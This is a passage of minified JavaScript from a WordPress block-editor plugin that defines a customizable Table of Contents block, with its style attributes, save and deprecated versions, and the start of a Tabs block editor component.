Top","ultimate-post"),include:[{position:1,data:{type:"tag",key:"toTopPosition",label:__("Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{position:2,data:{type:"tag",key:"toTopIcon",label:__("Icon","ultimate-post"),options:[{value:"arrowUp2",label:__("Angle","ultimate-post")},{value:"longArrowUp2",label:__("Arrow","ultimate-post")},{value:"caretArrow",label:__("Caret","ultimate-post")}]}},{position:3,data:{type:"color",key:"toTopColor",label:__("Color","ultimate-post")}},{position:4,data:{type:"color",key:"toTopBg",label:__("Background","ultimate-post")}},{position:5,data:{type:"color",key:"toTopHoverColor",label:__("Hover Color","ultimate-post")}},{position:6,data:{type:"color",key:"toTopHoverBg",label:__("Hover Background","ultimate-post")}},{position:7,data:{type:"range",key:"toTopSize",label:__("Icon Size","ultimate-post"),min:0,max:80,step:1,unit:!1,responsive:!0}},{position:8,data:{type:"border",key:"toTopBorder",label:__("Border","ultimate-post")}},{position:9,data:{type:"dimension",key:"toTopRadius",label:__("Button Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:10,data:{type:"dimension",key:"toTopPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}]})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:G}),(0,o.createElement)(a.Mg,{store:G}),(0,o.createElement)(a.iv,{store:G}))),(0,a.dH)()),(0,o.createElement)(s.Z,{include:[{type:"template"},{type:"layout",block:"table-of-content",key:"layout",options:[{img:"assets/img/layouts/toc/toc1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/toc/toc2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!1},{img:"assets/img/layouts/toc/toc3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0},{img:"assets/img/layouts/toc/toc4.png",label:__("Style 4","ultimate-post"),value:"style4",pro:!0},{img:"assets/img/layouts/toc/toc5.png",label:__("Style 5","ultimate-post"),value:"style5",pro:!0},{img:"assets/img/layouts/toc/toc6.png",label:__("Style 6","ultimate-post"),value:"style6",pro:!0},{img:"assets/img/layouts/toc/toc7.png",label:__("Style 7","ultimate-post"),value:"style7",pro:!0},{img:"assets/img/layouts/toc/toc8.png",label:__("Style 8","ultimate-post"),value:"style8",pro:!0}]}],store:G}),(0,o.createElement)("div",$,q&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:q}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-block-toc"},(0,o.createElement)("div",{className:"ultp-toc-header"},(0,o.createElement)("div",{className:"ultp-toc-heading"},(0,o.createElement)(u,{key:"editable",tagName:"span",placeholder:__("Heading Table of Contents…","ultimate-post"),onChange:e=>x({headText:e}),value:B})),M&&(0,o.createElement)("div",{className:`ultp-collapsible-toggle ${z?"ultp-toggle-collapsed":""} ${"right"==H?"ultp-collapsible-right":""}`},"icon"!==A?(0,o.createElement)(b,null,(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-open",onClick:e=>{e.preventDefault()}},"[",R,"]"),(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},"[",D,"]")):(0,o.createElement)(b,null,(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-open",onClick:e=>{e.preventDefault()}},p.ZP.arrowUp2),(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},p.ZP.arrowUp2)))),(0,o.createElement)("div",{className:`ultp-block-toc-${U} ultp-block-toc-body`},(0,a.Ko)(O,U)),N&&(0,o.createElement)("a",{href:"#",className:"ultp-toc-backtotop tocshow"},p.ZP[j])))))}},57098:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(64766);const{Fragment:n}=wp.element,{useBlockProps:r}=wp.blockEditor;function s(e){const{blockId:t,advanceId:l,headText:s,collapsible:p,collapsibleType:c,togglePosition:u,topTop:d,toTopIcon:m,layout:g,sticky:y,listData:b,open:v,close:h,initialCollapsible:f,className:k}=e.attributes,w=r.save({...l&&{id:l},className:`ultp-block-${t} ${k} ${1==y?"ultp-toc-sticky":""}`});return(0,o.createElement)("div",w,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-block-toc"},(0,o.createElement)("div",{className:"ultp-toc-header"},(0,o.createElement)("div",{className:"ultp-toc-heading"},s),p&&(0,o.createElement)("div",{className:`ultp-collapsible-toggle ${f?"ultp-toggle-collapsed":""} ${"right"==u?"ultp-collapsible-right":""}`},"icon"!==c?(0,o.createElement)(n,null,(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-open",onClick:e=>{e.preventDefault()}},"[",v,"]"),(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},"[",h,"]")):(0,o.createElement)(n,null,(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-open",onClick:e=>{e.preventDefault()}},"_ultp_toc_ic_arrowUp2_ultp_toc_ic_end_"),(0,o.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},"_ultp_toc_ic_arrowUp2_ultp_toc_ic_end_")))),(0,o.createElement)("div",{className:`ultp-block-toc-${g} ultp-block-toc-body`,style:{display:f?"none;":"block;"}},(0,a.Ko)(b,g)),d&&(0,o.createElement)("a",{href:"#",className:"ultp-toc-backtotop tocshow"},i.ZP[m]))))}},66838:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},listData:{type:"string",default:"[]"},currentPostId:{type:"string",default:""},tag:{type:"string",default:'["h1","h2","h3","h4","h5","h6"]'},collapsible:{type:"boolean",default:!0},initialCollapsible:{type:"boolean",default:!1},topTop:{type:"boolean",default:!1},headText:{type:"string",default:"Table of Contents"},headColor:{type:"string",default:"#222",style:[{selector:"{{ULTP}} .ultp-toc-heading { color:{{headColor}}; }"}]},headBg:{type:"string",default:"#f7f7f7",style:[{selector:"{{ULTP}} .ultp-toc-header { background:{{headBg}}; }"}]},headTypo:{type:"object",default:{openTypography:1,size:{lg:22,unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:"",weight:700},style:[{selector:"{{ULTP}} .ultp-toc-heading"}]},headBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:1,left:0},color:"#eee",type:"solid"},style:[{selector:"{{ULTP}} .ultp-toc-header"}]},headRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-toc-header { border-radius:{{headRadius}}; }"}]},headPadding:{type:"object",default:{lg:{top:"16",bottom:"16",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-toc-header { padding:{{headPadding}}; }"}]},layout:{type:"string",default:"style1"},hoverStyle:{type:"string",default:"none",style:[{depends:[{key:"hoverStyle",condition:"==",value:"none"}]},{depends:[{key:"hoverStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover { border-bottom-style:dotted; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover { border-bottom-style:solid; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover { border-bottom-style:dashed; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover { text-decoration:underline; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style5"}],selector:'{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a { position:relative; } \n                {{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:after {content: ""; position:absolute; left:0; width:0; top:calc(100% + 2px); transition: width 350ms,opacity 350ms;} \n                {{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover:after { opacity:1; width:100%; }'}]},borderColor:{type:"string",default:"#037fff",style:[{depends:[{key:"hoverStyle",condition:"==",value:["style1","style2","style3"]}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover { border-bottom-color:{{borderColor}}; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:after {background:{{borderColor}}; }"}]},borderWidth:{type:"string",default:"1",style:[{depends:[{key:"hoverStyle",condition:"==",value:["style1","style2","style3"]}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:hover {border-bottom-width: {{borderWidth}}px; }"},{depends:[{key:"hoverStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists a:after {height:{{borderWidth}}px; }"}]},sticky:{type:"boolean",default:!1},stickyPosition:{type:"string",default:"right",style:[{depends:[{key:"stickyPosition",condition:"==",value:"left"},{key:"sticky",condition:"==",value:!0}],selector:"{{ULTP}}.ultp-toc-sticky.ultp-toc-scroll { right:auto;left:0; }"},{depends:[{key:"stickyPosition",condition:"==",value:"right"},{key:"sticky",condition:"==",value:!0}],selector:"{{ULTP}}.ultp-toc-sticky.ultp-toc-scroll { right:0;left:auto; }"},{depends:[{key:"stickyPosition",condition:"==",value:"top"},{key:"sticky",condition:"==",value:!0}],selector:"{{ULTP}}.ultp-toc-sticky.ultp-toc-scroll { top:0;left:0;right:0;margin: 0 auto; } \n                .admin-bar .ultp-toc-sticky.ultp-toc-scroll { top: 32px}"}]},listWidth:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"sticky",condition:"==",value:!0}],selector:"{{ULTP}}.wp-block-ultimate-post-table-of-content.ultp-toc-sticky { max-width: {{listWidth}}; width: {{listWidth}}; } \n                .single {{ULTP}}.wp-block-ultimate-post-table-of-content.ultp-toc-sticky { max-width: {{listWidth}}; width: {{listWidth}}; }"},{depends:[{key:"sticky",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-wrapper { max-width: {{listWidth}}; width: {{listWidth}}; } \n                .single {{ULTP}} .ultp-block-wrapper { max-width: {{listWidth}}; width: {{listWidth}}; }"}]},listSpacingX:{type:"object",default:{lg:"8"},style:[{selector:"{{ULTP}} .ultp-toc-lists li { margin-top: {{listSpacingX}}px; }"}]},listSpacingY:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} .ultp-toc-lists li a { margin-left: {{listSpacingY}}px;}"}]},listColor:{type:"string",default:"#222",style:[{selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists li a::before, \n            {{ULTP}} .ultp-block-toc-body .ultp-toc-lists a, \n            {{ULTP}} .ultp-block-toc-body .ultp-toc-lists { color:{{listColor}}; }"}]},listHoverColor:{type:"string",default:"#037fff",style:[{selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists > li a:hover::before, \n            {{ULTP}} .ultp-block-toc-body .ultp-toc-lists > li a:hover { color:{{listHoverColor}}; }"}]},listBg:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-block-toc-body { background-color:{{listBg}}; }"}]},listTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:"",weight:500},style:[{selector:"{{ULTP}} .ultp-block-toc-body .ultp-toc-lists li a"}]},listPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-toc-body { padding:{{listPadding}}; }"}]},togglePosition:{type:"string",default:"right",style:[{depends:[{key:"togglePosition",condition:"==",value:"withTitle"},{key:"collapsible",condition:"==",value:!0}]},{depends:[{key:"togglePosition",condition:"==",value:"right"},{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-toggle.ultp-collapsible-right { margin-left:auto; }"}]},collapsibleType:{type:"string",default:"text",style:[[{depends:{key:"collapsible",condition:"==",value:!0}}]]},open:{type:"string",default:"Open",style:[{depends:[{key:"collapsibleType",condition:"==",value:"text"},{key:"collapsible",condition:"==",value:!0}]}]},close:{type:"string",default:"Close",style:[{depends:[{key:"collapsibleType",condition:"==",value:"text"},{key:"collapsible",condition:"==",value:!0}]}]},collapsibleColor:{type:"string",default:"#037fff",style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-toc .ultp-toc-header .ultp-collapsible-text { color:{{collapsibleColor}}; } \n            {{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a svg { color:{{collapsibleColor}}; }"}]},collapsibleBg:{type:"string",default:"",style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-collapsible-toggle a { background:{{collapsibleBg}}; }"}]},collapsibleHoverColor:{type:"string",default:"",style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-text:hover { color:{{collapsibleHoverColor}}; } \n            {{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a:hover svg { color:{{collapsibleHoverColor}}; }"}]},collapsibleHoverBg:{type:"string",default:"",style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a:hover { background:{{collapsibleHoverBg}}; }"}]},collapsibleTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:700},style:[{depends:[{key:"collapsibleType",condition:"==",value:"text"},{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-text"}]},collapsibleBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a"}]},collapsibleRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a { border-radius:{{collapsibleRadius}}; }"}]},collapsiblePadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"collapsible",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-toc-header .ultp-collapsible-toggle a { padding:{{collapsiblePadding}}; }"}]},toTopPosition:{type:"string",default:"right",style:[{depends:[{key:"toTopPosition",condition:"==",value:"left"},{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop { left:40px;right:auto; }"},{depends:[{key:"toTopPosition",condition:"==",value:"right"},{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop { right:40px;left:auto; }\n                .editor-styles-wrapper .ultp-toc-backtotop {margin-right: 260px; margin-left: 150px;}"}]},toTopIcon:{type:"string",default:"arrowUp2",style:[[{depends:{key:"topTop",condition:"==",value:!0}}]]},toTopColor:{type:"string",default:"#fff",style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop svg { color:{{toTopColor}}; }"}]},toTopBg:{type:"string",default:"#222",style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop { background:{{toTopBg}}; }"}]},toTopHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop:hover svg { color:{{toTopHoverColor}}; }"}]},toTopHoverBg:{type:"string",default:"#000",style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}}.wp-block-ultimate-post-table-of-content .ultp-block-wrapper .ultp-toc-backtotop:hover, \n            {{ULTP}}.wp-block-ultimate-post-table-of-content .ultp-block-wrapper .ultp-toc-backtotop:focus { background:{{toTopHoverBg}}; }"}]},toTopSize:{type:"object",default:{lg:"18"},style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop svg { width:{{toTopSize}}px; }"}]},toTopBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop"}]},toTopRadius:{type:"object",default:{lg:{top:"4",bottom:"4",left:"4",right:"4",unit:"px"}},style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop { border-radius:{{toTopRadius}}; }"}]},toTopPadding:{type:"object",default:{lg:{top:"13",bottom:"15",left:"11",right:"11",unit:"px"}},style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop { padding:{{toTopPadding}}; }"}]},advanceId:{type:"string",default:""},...(0,l(92165).t)(["advanceAttr"],["loadingColor","advanceId"],[{key:"wrapShadow",default:{openShadow:1,width:{top:2,right:5,bottom:15,left:-2,unit:"px"},color:"rgba(0,0,0,0.1)"},style:[{selector:"{{ULTP}} .ultp-block-wrapper"}]},{key:"wrapShadow",default:{openShadow:1,width:{top:2,right:5,bottom:15,left:-2,unit:"px"},color:"rgba(0,0,0,0.1)"},style:[{selector:"{{ULTP}} .ultp-block-wrapper"}]}])}},54934:(e,t,l)=>{"use strict";l.d(t,{Z:()=>c});var o=l(87462),a=l(67294),i=l(53049),n=l(83245),r=l(64766),s=l(66838);const{Fragment:p}=wp.element,c=[{attributes:{...s.Z},save({attributes:e}){const{blockId:t,advanceId:l,headText:n,collapsible:s,collapsibleType:c,togglePosition:u,topTop:d,toTopIcon:m,layout:g,sticky:y,listData:b,open:v,close:h,initialCollapsible:f}=e;return console.log("1 testing from deprecated"),(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t} ${1==y?"ultp-toc-sticky":""}`}),(0,a.createElement)("div",{className:"ultp-block-wrapper"},(0,a.createElement)("div",{className:"ultp-block-toc"},(0,a.createElement)("div",{className:"ultp-toc-header"},(0,a.createElement)("div",{className:"ultp-toc-heading"},n),s&&(0,a.createElement)("div",{className:`ultp-collapsible-toggle ${f?"ultp-toggle-collapsed":""} ${"right"==u?"ultp-collapsible-right":""}`},"icon"!==c?(0,a.createElement)(p,null,(0,a.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-open",onClick:e=>{e.preventDefault()}},"[",v,"]"),(0,a.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},"[",h,"]")):(0,a.createElement)(p,null,(0,a.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-open",onClick:e=>{e.preventDefault()}},"_ultp_toc_ic_arrowUp2_ultp_toc_ic_end_"),(0,a.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},"_ultp_toc_ic_arrowUp2_ultp_toc_ic_end_")))),(0,a.createElement)("div",{className:`ultp-block-toc-${g} ultp-block-toc-body`,style:{display:f?"none;":"block;"}},(0,i.Ko)(b,g)),d&&(0,a.createElement)("a",{href:"#",className:"ultp-toc-backtotop tocshow"},r.ZP[m]))))}},{attributes:{...s.Z},save({attributes:e}){const{blockId:t,advanceId:l,headText:r,collapsible:s,collapsibleType:c,togglePosition:u,topTop:d,toTopIcon:m,layout:g,sticky:y,listData:b,open:v,close:h,initialCollapsible:f}=e;return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t} ${1==y?"ultp-toc-sticky":""}`}),(0,a.createElement)("div",{className:"ultp-block-wrapper"},(0,a.createElement)("div",{className:"ultp-block-toc"},(0,a.createElement)("div",{className:"ultp-toc-header"},(0,a.createElement)("div",{className:"ultp-toc-heading"},r),s&&(0,a.createElement)("div",{className:`ultp-collapsible-toggle ${f?"ultp-toggle-collapsed":""} ${"right"==u?"ultp-collapsible-right":""}`},"icon"!==c?(0,a.createElement)(p,null,(0,a.createElement)("a",{className:"ultp-collapsible-text ultp-collapsible-open",href:"javascript:;"},"[",v,"]"),(0,a.createElement)("a",{className:"ultp-collapsible-text ultp-collapsible-hide",href:"javascript:;"},"[",h,"]")):(0,a.createElement)(p,null,(0,a.createElement)("a",{className:"ultp-collapsible-icon ultp-collapsible-open",href:"javascript:;"},n.ZP.arrowUp2),(0,a.createElement)("a",{className:"ultp-collapsible-icon ultp-collapsible-hide",href:"javascript:;"},n.ZP.arrowUp2)))),(0,a.createElement)("div",{className:`ultp-block-toc-${g} ultp-block-toc-body`,style:{display:f?"none;":"block;"}},(0,i.Ko)(b,g)),d&&(0,a.createElement)("a",{href:"#",className:"ultp-toc-backtotop tocshow"},n.ZP[m]))))}}]},28871:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(99233),n=l(57098),r=l(66838),s=l(92857),p=l(54934);const{__}=wp.i18n,{registerBlockType:c}=wp.blocks,u=(0,a.Z)("https://wpxpo.com/docs/postx/add-on/table-of-content/","block_docs");c(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/table-of-content.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Add a Customizable Table of Contents into your blog posts and custom post types.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:u,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/tableofcontents.svg"}},edit:i.Z,save:n.Z,deprecated:p.Z})},88625:(e,t,l)=>{"use strict";l.d(t,{Z:()=>L});var o=l(67294),a=l(53049),i=l(99838),n=l(41557),r=l(87763),s=l(31760),p=l(64766),c=l(58207),u=l(80518);const{__}=wp.i18n,{Dropdown:d}=wp.components,{useEffect:m,Fragment:g,useState:y,useRef:b}=wp.element,{InnerBlocks:v,InspectorControls:h,RichText:f,BlockControls:k,useBlockProps:w}=wp.blockEditor,{getBlockAttributes:x,getBlockRootClientId:T,getBlocksByClientId:_}=wp.data.select("core/block-editor"),{removeBlock:C,insertBlocks:E,moveBlockToPosition:S,updateBlockAttributes:P}=wp.data.dispatch("core/block-editor");function L(e){const[t,l]=y("Content"),{setAttributes:f,name:L,attributes:B,className:U,clientId:M}=e,{blockId:A,currentPostId:H,advanceId:N,previewImg:j,titleTag:Z,navTitle:O,navDescription:R,navIcon:D,chooseIcon:z,activetab:F,layout:W,tabFullWidth:V,tabArrowEnable:G,tabChange:q,initialOpen:$,enableProgressBar:K,tabResponsive:J,stackOnMobile:Y}=B;if(m((()=>{const e=M.substr(0,6),t=x(T(M));(0,a.qi)(f,t,H,M),A?A&&A!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||f({blockId:e})):f({blockId:e})}),[M]),j)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:j});let X;A&&(X=(0,i.Kh)(B,"ultimate-post/tabs",A,(0,a.k0)()));const Q={setAttributes:f,name:L,attributes:B,setSection:l,section:t,clientId:M},ee=b(null),te=b(null),le=b(null),[oe,ae]=y(null),[ie,ne]=y([]),[re,se]=y(!1);let pe=_(M)[0].innerBlocks;const[ce,ue]=y(pe),[de,me]=y({});m((()=>{ue(pe)}),[pe]),m((()=>{P(de?.id,{nav_icon:de?.icon?.length>0?de?.icon:""}),(0,a.Gu)(de?.id),(0,a.Gu)(M)}),[de]),m((()=>{oe&&(S(oe.id,M,M,oe.position),ce.forEach(((e,t)=>{P(e.clientId,{disableChild:!0})})),pe=_(M)[0].innerBlocks,(0,a.Gu)(M),ue(pe))}),[oe]),m((()=>{let e=[];ce?.forEach((t=>{let l={};const{tabIndex:o,tabActive:a,nav_desc:i,nav_text:n,nav_icon:r}=t?.attributes||{};l.tabIndex=o.toLocaleString(),l.active=a,l.nav_desc=i,l.nav_text=n,l.nav_icon=r,e.push(l)})),f({tabMainData:JSON.stringify(e)})}),[ce]);const ge=(e,t)=>{f({activetab:`${e}`}),ce.forEach(((t,l)=>{t.attributes?.tabIndex==e?P(t.clientId,{tabActive:!0}):P(t.clientId,{tabActive:!1})}))},ye=()=>{const e=ie&&ie.length>0?ie.sort((function(e,t){return t-e}))[ie.length-1]:ce.length+1,t={tabActive:!0,nav_text:`Tab ${e}`,tabIndex:e.toLocaleString(),nav_desc:"Elevate your wardrobe with this timeless linen blazer, designed for both style"},l=wp.blocks.createBlock("ultimate-post/tab-item",t);if(E(l,ce.length,M,!1),ie&&ie.length>0){const e=ie.slice(0,-1);ne(e)}},be=(e,t,l)=>{ae({id:e,position:t,activeBlock:l})},ve=b(null),[he,fe]=y(0),ke="left"==W||"right"==W;let we=ke?ve.current?.getBoundingClientRect().height:ve.current?.getBoundingClientRect().width,xe=ke?le.current?.getBoundingClientRect().height:le.current?.getBoundingClientRect().width;const Te=xe/ce.length,_e=xe-we,Ce=he+we;m((()=>{we=ke?ve.current?.getBoundingClientRect().height:ve.current?.getBoundingClientRect().width,xe=ke?le.current?.getBoundingClientRect().height:le.current?.getBoundingClientRect().width,we<xe?(se(!0),ke&&fe(0)):se(!1)}),[xe,W,J]);const Ee=ke?`translate(0px, ${he<0?he:"-"+he}px)`:`translate(-${he}px, 0px)`,Se=w({...N&&{id:N},className:`ultp-block-${A} ${U||""}`,"data-tabevent":q,"data-activetab":$});return(0,o.createElement)(g,null,(0,o.createElement)(k,null,(0,o.createElement)(u.Z,{store:Q,handleAddNewTab:ye})),(0,o.createElement)(h,null,(0,o.createElement)(c.Z,{store:Q})),(0,o.createElement)(s.Z,{include:[{type:"template"}],store:Q}),(0,o.createElement)("div",Se,X&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:X}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{draggable:"false",className:`ultp-tab-wrapper ultp-tab-wrapper-backend ultp-tab-${J} ultp-nav-${W} ultp-tab-${V?"fill-width":"full-width"} ultp-tab-arrow-${-G?"on":"off"} ${Y?" ultp-tab-mobile-stack":""}`},(0,o.createElement)("div",{className:"ultp-tabs-nav-wrapper",draggable:"false"},("slider"==J||ke)&&0!=he&&(0,o.createElement)("span",{className:"ultp-tab-left-arrow ultp-arrow-active",onClick:()=>{_e+he>0&&(_e<Te||he-Te<0?(fe(0),se(!0)):(se(!0),fe(he-Te)))}},p.ZP.leftAngleBold),(0,o.createElement)("div",{draggable:"false",className:"ultp-tabs-nav-inner",ref:ve},(0,o.createElement)("div",{draggable:"false",className:"ultp-tabs-nav",ref:le,style:{transform:Ee},"data-tabnavigation":`.ultp-block-${A}`},ce&&ce?.length>0&&ce.map(((e,t)=>{const{tabIndex:l,nav_text:i,nav_desc:s,tabActive:c,nav_icon:u}=e?.attributes||{},m={titleTag:Z,navDescription:R,navIcon:D,navTitle:O,setAttributes:f,chooseIcon:z,tabIndex:l,nav_text:i,nav_desc:s,id:e.clientId,nav_icon:u,setChildIcon:me,clientId:M,innerBlocks:e.innerBlocks};return(0,o.createElement)("div",{draggable:"false",className:"ultp-tabs-nav-element "+(l==F?"ultp-tab-active tab-progressbar-active":""),onClick:()=>ge(l),onMouseEnter:()=>"mouseenter"==q?ge(l):"",ref:ee,key:l},(0,o.createElement)(I,{navigationAttr:m}),l==F?(0,o.createElement)("div",{className:"ultp-tabs-setting"},(0,o.createElement)("div",{className:"ultp-individual-settings"},(0,o.createElement)("div",{className:"ultp-individual-settings-position"},(0,o.createElement)("div",{onClick:()=>be(e.clientId,t-1,l)}),(0,o.createElement)("div",{onClick:()=>be(e.clientId,t+1,l)})),(0,o.createElement)("div",{className:"ultp-individual-settings-action"},D&&(u.length||z.length)?(0,o.createElement)(d,{position:"bottom right",className:"ultp-listicon-dropdown ultp-tab-icon-dropdown",renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{onClick:()=>e(),className:"ultp-tabs-nav-icon"},p.ZP.five_star_line),renderContent:()=>(0,o.createElement)(n.Z,{inline:!0,value:u.length?u:z,label:"Update Single Icon",dynamicClass:" ",onChange:t=>{me({id:e.clientId,icon:t==u?"":t}),(0,a.Gu)(e.clientId),(0,a.Gu)(M)}})}):"",(0,o.createElement)("div",{onClick:()=>((e,t)=>{const l=ie&&ie.length>0?ie.sort((function(e,t){return t-e}))[ie.length-1]:ce.length+1,o={tabIndex:l.toLocaleString(),nav_id:l.toLocaleString(),tabActive:!0,nav_text:`${e.nav_text} Copied`,nav_desc:e.nav_desc},a=wp.blocks.createBlock("ultimate-post/tab-item",o);if(E(a,t+1,M,!0),ie&&ie.length>0){const e=ie.slice(0,-1);ne(e)}})(m,t)},r.Z.duplicate)),(0,o.createElement)("div",{onClick:()=>((e,t)=>{const l=[...ie,t];ne(l),ce.forEach(((t,l)=>{t.clientId==e&&C(t.clientId,!1)}))})(e.clientId,l),className:"ultp-individual-settings-delete"},r.Z.delete))):"",K&&(0,o.createElement)("span",{className:"tab-progressbar"}))}))),(0,o.createElement)("div",{className:"ultp-add-new-tab",onClick:()=>ye()},r.Z.plus)),("slider"==J||ke)&&re&&(0,o.createElement)("span",{className:"ultp-tab-right-arrow 